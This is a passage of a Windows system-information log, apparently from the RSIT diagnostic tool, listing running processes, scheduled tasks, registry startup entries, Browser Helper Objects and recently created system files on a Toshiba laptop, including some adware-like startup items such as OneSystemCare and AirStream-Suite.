-Population-Restrict/normal/*UMA-Uniformity-Trial-1-Percent/group_28/*UMA-Uniformity-Trial-10-Percent/group_03/*UMA-Uniformity-Trial-100-Percent/group_01/*UMA-Uniformity-Trial-20-Percent/group_02/*UMA-Uniformity-Trial-5-Percent/group_07/*UMA-Uniformity-Trial-50-Percent/default/*UseDelayAgnosticAEC/DefaultEnabled/*WebFontsIntervention/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/ --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="9884.4.658599113\1595821645" /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=ppapi-broker --channel="9884.5.1888498629\1864867710" --lang=en-GB --device-scale-factor=1 /prefetch:4
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,WebFontsIntervention<WebFontsIntervention --lang=en-GB --force-fieldtrials=AppBannerTriggering/Aggressive/AutofillProfileOrderByFrecency/Enabled/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/*ClientSideDetectionModel/Model0/*CrossDevicePromo/7DaySingleProfile/*DataReductionProxyConfigService/Enabled/*DirectWriteFontProxy/UseDirectWriteFontProxy/*ExtensionActionRedesign/Enabled/ExtensionDeveloperModeWarning/Enabled/*ExtensionInstallVerification/Enforce/*GFE/Default/InstanceID/Enabled/IntelligentSessionRestore/Enabled2/MaterialDesignDownloads/Enabled/*NetworkQualityEstimator/Enabled/*OmniboxBundledExperimentV1/Stable_EthersuggestPrefix_A3/*PasswordBranding/Disabled/*PasswordGeneration/Disabled/PreRead/Default/*QUIC/EnabledNoId/ReportCertificateErrors/ShowAndPossiblySend/*ResourcePriorities/Launch50pct_11011_1_1_10/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/*SRTPromptFieldTrial/On/SSLCommonNameMismatchHandling/Disabled/*SafeBrowsingIncidentReportingService/Default/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/*UMA-Uniformity-Trial-1-Percent/group_28/*UMA-Uniformity-Trial-10-Percent/group_03/*UMA-Uniformity-Trial-100-Percent/group_01/*UMA-Uniformity-Trial-20-Percent/group_02/*UMA-Uniformity-Trial-5-Percent/group_07/*UMA-Uniformity-Trial-50-Percent/default/*UseDelayAgnosticAEC/DefaultEnabled/*WebFontsIntervention/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/ --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="9884.8.1567192589\1427680594" /prefetch:1
"C:\WINDOWS\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe7_ Global\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\WINDOWS\system32\SearchFilterHost.exe" 0 636 640 648 8192 644
"C:\WINDOWS\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-4246815794-1745546178-596238576-5008_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-4246815794-1745546178-596238576-5008 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Users\Administrator\Downloads\RSITx64 (2).exe"
java -jar "C:\Program Files (x86)\AirStream-Suite\AirstreamVideoIndexer.jar"
\??\C:\WINDOWS\system32\conhost.exe 0x4

======Scheduled tasks folder======

C:\WINDOWS\tasks\Adobe Flash Player PPAPI Notifier.job - C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_19_0_0_185_pepper.exe -check pepperplugin
C:\WINDOWS\tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core.job - C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
C:\WINDOWS\tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA.job - C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job - C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe /c
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job - C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\WINDOWS\tasks\One System CarePeriod.job - C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe -scan

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}]
Skype for Business Browser Helper - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-03-15 228552]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08 2134656]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}]
Microsoft SkyDrive Pro Browser Helper - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-03-15 2348336]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}]
Skype for Business Browser Helper - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-15 163016]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-02-04 460712]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08 1725056]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}]
Microsoft SkyDrive Pro Browser Helper - C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-03-15 1741096]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-02-04 172968]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2009-08-31 8095776]
"ThpSrv"=C:\Windows\system32\thpsrv /logon []
"TosSENotify"=C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [2009-11-05 709976]
"HDMICtrlMan"=C:\Program Files\TOSHIBA\HDMICtrlMan\HDMICtrlMan.exe [2009-10-23 1032536]
"TosWaitSrv"=C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [2010-02-05 705368]
"Toshiba Registration"=C:\Program Files\Toshiba\Registration\ToshibaReminder.exe [2009-08-25 134032]
"AdobeAAMUpdater-1.0"=C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04 446392]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-12 3944648]
"DameWare MRC Agent"=C:\Windows\dwrcs\DWRCST.exe [2011-12-12 298944]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GoogleChromeAutoLaunch_361C1DD22E1256C6B68316A32E8B1949"=C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [2016-04-06 874648]
"Dropbox Update"=C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-19 134512]
"Remote Mouse"=C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe [2015-11-18 837632]
"OneDrive"=C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-03-09 551104]
"CCleaner Monitoring"=C:\Program Files (x86)\CCleaner\CCleaner64.exe [2016-01-15 8619224]
"Chromium"=c:\users\administrator\appdata\local\chromium\application\chrome.exe [2016-01-26 1043456]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"=C:\WINDOWS\system32\cmd.exe [2015-10-30 233984]
"Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1"=C:\WINDOWS\system32\cmd.exe [2015-10-30 233984]
"Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"=C:\WINDOWS\system32\cmd.exe [2015-10-30 233984]
"Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127"=C:\WINDOWS\system32\cmd.exe [2015-10-30 233984]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite]
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe -autorun []

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"=C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [2009-10-02 284696]
"HWSetup"=C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [2009-06-02 423936]
"KeNotify"=C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [2009-01-13 34088]
"TWebCamera"=C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2009-11-21 2454840]
"ToshibaServiceStation"=C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [2011-02-11 1295736]
"AvastUI.exe"=C:\Program Files\Alwil Software\Avast5\AvastUI.exe [2016-03-23 7139256]
"BtTray"=C:\Program Files (x86)\IVT Corporation\BlueSoleil\BtTray.exe [2009-09-02 315478]
"SwitchBoard"=C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
"AdobeCS6ServiceManager"=C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [2012-03-09 1073312]
"mbot_gb_014010252"= []
"DivXMediaServer"=C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe []

[HKEY_CURRENT_USER\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"TiVme Agent"=C:\Program Files (x86)\KWorld Multimedia\TiVmeScheduleAgent.exe []

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
AirStream-Suite.lnk - C:\WINDOWS\Installer\{734D87EE-15DC-49C9-943E-605E9B55A5D8}\_7A184E116278B0ED1EDD31.exe

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Dropbox.lnk - C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe
OneNote 2007 Screen Clipper and Launcher.lnk - C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ahcache.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CoreMessagingRegistrar]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\StateRepository]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TileDataModelSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\UserManager]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Ahcache.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CoreMessagingRegistrar]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SpbCx.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\StateRepository]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\TileDataModelSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\uefi.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\UserManager]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DSCAutomationHostEnabled"=2
"EnableCursorSuppression"=0
"FilterAdministratorToken"=1
"SoftwareSASGeneration"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"midimapper"=midimap.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"msacm.msadpcm"=msadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"vidc.i420"=iyuv_32.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvu9"=tsbyuv.dll
"vidc.yvyu"=msyuv.dll
"wavemapper"=msacm32.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux1"=wdmaud.drv

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2016-04-15 20:51:41 ----HD---- C:\OneDriveTemp
2016-04-12 21:54:24 ----A---- C:\WINDOWS\system32\edgehtml.dll
2016-04-12 21:54:22 ----A---- C:\WINDOWS\system32\mshtml.dll
2016-04-12 21:54:16 ----A---- C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-04-12 21:54:08 ----A---- C:\WINDOWS\SYSWOW64\mshtml.dll
2016-04-12 21:54:03 ----A---- C:\WINDOWS\SYSWOW64\edgehtml.dll
2016-04-12 21:54:01 ----A---- C:\WINDOWS\system32\twinui.dll
2016-04-12 21:54:00 ----A---- C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 21:53:59 ----A---- C:\WINDOWS\system32\Chakra.dll
2016-04-12 21:53:57 ----A---- C:\WINDOWS\system32\ieframe.dll
2016-04-12 21:53:56 ----A---- C:\WINDOWS\SYSWOW64\twinui.dll
2016-04-12 21:53:56 ----A---- C:\WINDOWS\system32\dwmcore.dll
2016-04-12 21:53:54 ----A---- C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-04-12 21:53:54 ----A---- C:\WINDOWS\system32\ntoskrnl.exe
2016-04-12 21:53:53 ----A---- C:\WINDOWS\system32\enterprisecsps.dll
2016-04-12 21:53:51 ----A---- C:\WINDOWS\system32\win32kfull.sys
2016-04-12 21:53:51 ----A---- C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-12 21:53:50 ----A---- C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-04-12 21:53:49 ----A---- C:\WINDOWS\SYSWOW64\ieframe.dll
2016-04-12 21:53:48 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Xaml.dll
2016-04-12 21:53:47 ----A---- C:\WINDOWS\system32\wininet.dll
2016-04-12 21:53:47 ----A---- C:\WINDOWS\system32\audiosrv.dll
2016-04-12 21:53:46 ----A---- C:\WINDOWS\system32\wuaueng.dll
2016-04-12 21:53:46 ----A---- C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-12 21:53:45 ----A---- C:\WINDOWS\system32\LicenseManager.dll
2016-04-12 21:53:44 ----A---- C:\WINDOWS\system32\esent.dll
2016-04-12 21:53:44 ----A---- C:\WINDOWS\system32\BingMaps.dll
2016-04-12 21:53:43 ----A---- C:\WINDOWS\SYSWOW64\wininet.dll
2016-04-12 21:53:43 ----A---- C:\WINDOWS\SYSWOW64\Chakra.dll
2016-04-12 21:53:43 ----A---- C:\WINDOWS\system32\dosvc.dll
2016-04-12 21:53:42 ----A---- C:\WINDOWS\SYSWOW64\esent.dll
2016-04-12 21:53:42 ----A---- C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-04-12 21:53:41 ----A---- C:\WINDOWS\SYSWOW64\Windows.ApplicationModel.Store.dll
2016-04-12 21:53:41 ----A---- C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-12 21:53:40 ----A---- C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-12 21:53:40 ----A---- C:\WINDOWS\system32\urlmon.dll
2016-04-12 21:53:40 ----A---- C:\WINDOWS\system32\InputService.dll
2016-04-12 21:53:39 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Logon.dll
2016-04-12 21:53:39 ----A---- C:\WINDOWS\system32\winload.exe
2016-04-12 21:53:39 ----A---- C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-04-12 21:53:38 ----A---- C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-04-12 21:53:38 ----A---- C:\WINDOWS\system32\Windows.Media.dll
2016-04-12 21:53:37 ----A---- C:\WINDOWS\SYSWOW64\urlmon.dll
2016-04-12 21:53:37 ----A---- C:\WINDOWS\system32\XblAuthManager.dll
2016-04-12 21:53:37 ----A---- C:\WINDOWS\system32\win32kbase.sys
2016-04-12 21:53:36 ----A---- C:\WINDOWS\SYSWOW64\LicenseManager.dll
2016-04-12 21:53:36 ----A---- C:\WINDOWS\system32\bisrv.dll
2016-04-12 21:53:35 ----A---- C:\WINDOWS\system32\RDXService.dll
2016-04-12 21:53:34 ----A---- C:\WINDOWS\SYSWOW64\CoreUIComponents.dll
2016-04-12 21:53:34 ----A---- C:\WINDOWS\system32\winresume.exe
2016-04-12 21:53:33 ----A---- C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-04-12 21:53:33 ----A---- C:\WINDOWS\system32\SRHInproc.dll
2016-04-12 21:53:32 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.dll
2016-04-12 21:53:31 ----A---- C:\WINDOWS\system32\tileobjserver.dll
2016-04-12 21:53:31 ----A---- C:\WINDOWS\system32\NetSetupEngine.dll
2016-04-12 21:53:31 ----A---- C:\WINDOWS\system32\MapsStore.dll
2016-04-12 21:53:30 ----A---- C:\WINDOWS\system32\NetSetupShim.dll
2016-04-12 21:53:30 ----A---- C:\WINDOWS\system32\MapControlCore.dll
2016-04-12 21:53:30 ----A---- C:\WINDOWS\system32\audiodg.exe
2016-04-12 21:53:29 ----A---- C:\WINDOWS\SYSWOW64\Windows.Web.Http.dll
2016-04-12 21:53:29 ----A---- C:\WINDOWS\SYSWOW64\AccountsRt.dll
2016-04-12 21:53:29 ----A---- C:\WINDOWS\system32\SRH.dll
2016-04-12 21:53:29 ----A---- C:\WINDOWS\system32\AccountsRt.dll
2016-04-12 21:53:28 ----A---- C:\WINDOWS\system32\wwansvc.dll
2016-04-12 21:53:28 ----A---- C:\WINDOWS\system32\TokenBroker.dll
2016-04-12 21:53:28 ----A---- C:\WINDOWS\system32\LockAppHost.exe
2016-04-12 21:53:28 ----A---- C:\WINDOWS\system32\drivers\ntfs.sys
2016-04-12 21:53:27 ----A---- C:\WINDOWS\SYSWOW64\RemoteNaturalLanguage.dll
2016-04-12 21:53:27 ----A---- C:\WINDOWS\SYSWOW64\LockAppHost.exe
2016-04-12 21:53:27 ----A---- C:\WINDOWS\system32\NMAA.dll
2016-04-12 21:53:27 ----A---- C:\WINDOWS\system32\msxml3.dll
2016-04-12 21:53:27 ----A---- C:\WINDOWS\system32\msv1_0.dll
2016-04-12 21:53:27 ----A---- C:\WINDOWS\system32\MessagingDataModel2.dll
2016-04-12 21:53:26 ----A---- C:\WINDOWS\SYSWOW64\BingMaps.dll
2016-04-12 21:53:25 ----A---- C:\WINDOWS\SYSWOW64\NetSetupShim.dll
2016-04-12 21:53:25 ----A---- C:\WINDOWS\system32\RDXTaskFactory.dll
2016-04-12 21:53:25 ----A---- C:\WINDOWS\system32\PhoneProviders.dll
2016-04-12 21:53:25 ----A---- C:\WINDOWS\system32\MsSpellCheckingFacility.dll
2016-04-12 21:53:25 ----A---- C:\WINDOWS\system32\MapConfiguration.dll
2016-04-12 21:53:24 ----A---- C:\WINDOWS\system32\Windows.Web.Http.dll
2016-04-12 21:53:24 ----A---- C:\WINDOWS\system32\SensorService.dll
2016-04-12 21:53:24 ----A---- C:\WINDOWS\system32\lsasrv.dll
2016-04-12 21:53:23 ----A---- C:\WINDOWS\SYSWOW64\msv1_0.dll
2016-04-12 21:53:22 ----A---- C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-12 21:53:22 ----A---- C:\WINDOWS\system32\UIAutomationCore.dll
2016-04-12 21:53:20 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Cred.dll
2016-04-12 21:53:20 ----A---- C:\WINDOWS\SYSWOW64\NetSetupEngine.dll
2016-04-12 21:53:19 ----A---- C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-04-12 21:53:19 ----A---- C:\WINDOWS\system32\fontdrvhost.exe
2016-04-12 21:53:18 ----A---- C:\WINDOWS\SYSWOW64\MapControlCore.dll
2016-04-12 21:53:18 ----A---- C:\WINDOWS\system32\StoreAgent.dll
2016-04-12 21:53:17 ----A---- C:\WINDOWS\system32\SharedStartModel.dll
2016-04-12 21:53:16 ----A---- C:\WINDOWS\system32\kerberos.dll
2016-04-12 21:53:15 ----A---- C:\WINDOWS\SYSWOW64\InputService.dll
2016-04-12 21:53:12 ----A---- C:\WINDOWS\SYSWOW64\UIAutomationCore.dll
2016-04-12 21:53:12 ----A---- C:\WINDOWS\SYSWOW64\SRHInproc.dll
2016-04-12 21:53:12 ----A---- C:\WINDOWS\system32\wuapi.dll
2016-04-12 21:53:12 ----A---- C:\WINDOWS\system32\JpMapControl.dll
2016-04-12 21:53:12 ----A---- C:\WINDOWS\system32\bdesvc.dll
2016-04-12 21:53:11 ----A---- C:\WINDOWS\SYSWOW64\dwmcore.dll
2016-04-12 21:53:11 ----A---- C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-04-12 21:53:11 ----A---- C:\WINDOWS\system32\NetSetupSvc.dll
2016-04-12 21:53:11 ----A---- C:\WINDOWS\system32\drivers\tcpip.sys
2016-04-12 21:53:10 ----A---- C:\WINDOWS\SYSWOW64\msi.dll
2016-04-12 21:53:10 ----A---- C:\WINDOWS\SYSWOW64\kerberos.dll
2016-04-12 21:53:10 ----A---- C:\WINDOWS\system32\StorSvc.dll
2016-04-12 21:53:10 ----A---- C:\WINDOWS\system32\atmfd.dll
2016-04-12 21:53:09 ----A---- C:\WINDOWS\SYSWOW64\StoreAgent.dll
2016-04-12 21:53:09 ----A---- C:\WINDOWS\SYSWOW64\msxml3.dll
2016-04-12 21:53:09 ----A---- C:\WINDOWS\system32\dmenrollengine.dll
2016-04-12 21:53:09 ----A---- C:\WINDOWS\system32\CredProvDataModel.dll
2016-04-12 21:53:08 ----A---- C:\WINDOWS\SYSWOW64\TokenBroker.dll
2016-04-12 21:53:08 ----A---- C:\WINDOWS\SYSWOW64\SRH.dll
2016-04-12 21:53:07 ----A---- C:\WINDOWS\system32\Windows.Web.dll
2016-04-12 21:53:07 ----A---- C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-04-12 21:53:07 ----A---- C:\WINDOWS\system32\drivers\ufx01000.sys
2016-04-12 21:53:07 ----A---- C:\WINDOWS\system32\dnsapi.dll
2016-04-12 21:53:06 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Speech.dll
2016-04-12 21:53:06 ----A---- C:\WINDOWS\SYSWOW64\fontdrvhost.exe
2016-04-12 21:53:06 ----A---- C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-04-12 21:53:06 ----A---- C:\WINDOWS\system32\msi.dll
2016-04-12 21:53:05 ----A---- C:\WINDOWS\SYSWOW64\MsSpellCheckingFacility.dll
2016-04-12 21:53:05 ----A---- C:\WINDOWS\SYSWOW64\MessagingDataModel2.dll
2016-04-12 21:53:05 ----A---- C:\WINDOWS\SYSWOW64\atmfd.dll
2016-04-12 21:53:04 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Input.Inking.dll
2016-04-12 21:53:04 ----A---- C:\WINDOWS\SYSWOW64\dnsapi.dll
2016-04-12 21:53:04 ----A---- C:\WINDOWS\system32\drivers\USBXHCI.SYS
2016-04-12 21:53:04 ----A---- C:\WINDOWS\system32\AppxSysprep.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\SYSWOW64\Windows.Web.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\storewuauth.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\profsvc.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\policymanagerprecheck.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\moshostcore.dll
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\LsaIso.exe
2016-04-12 21:53:03 ----A---- C:\WINDOWS\system32\AboveLockAppHost.dll
2016-04-12 21:53:02 ----A---- C:\WINDOWS\SYSWOW64\policymanager.dll
2016-04-12 21:53:02 ----A---- C:\WINDOWS\SYSWOW64\CredProvDataModel.dll
2016-04-12 21:53:02 ----A---- C:\WINDOWS\system32\fveapi.dll
2016-04-12 21:53:02 ----A---- C:\WINDOWS\system32\drivers\ndis.sys
